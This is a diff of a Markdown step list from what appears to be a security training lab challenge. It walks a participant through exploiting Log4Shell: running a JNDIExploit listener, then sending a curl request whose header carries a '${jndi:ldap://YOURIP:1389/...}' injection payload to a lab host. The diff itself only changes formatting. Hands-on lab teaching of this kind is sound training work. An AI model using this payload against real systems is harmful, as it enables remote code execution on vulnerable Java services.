deep-security/tdc-2022-techday-2/challenges/file_storage_security/wording/src/task04/main.md

 1. Open a Terminal Emulator window

-2. Run <code>hostname -I</code> to get your ip address
+2. Run "hostname -I" to get your ip address

-3. Run <code>java –jar JNDIExploit-1.2-SNAPSHOT.jar -i YOURIP</code>
+3. Run "java –jar JNDIExploit-1.2-SNAPSHOT.jar -i YOURIP"

-4. Open another window and run <code>curl http://sudosingles-optimizer -H 'X-Api-Version: ${jndi:ldap://YOURIP:1389/Basic/SpringEcho}'</code>
+4. Open another window and run "curl http://sudosingles-optimizer -H 'X-Api-Version: ${jndi:ldap://YOURIP:1389/Basic/SpringEcho}'"

-5. If you are successful, you should see a line that looks like the following show up in your original terminal window: <code>[+] Response code: 200</code>
+5. If you are successful, you should see a line that looks like the following show up in your original terminal window: "[+] Response code: 200"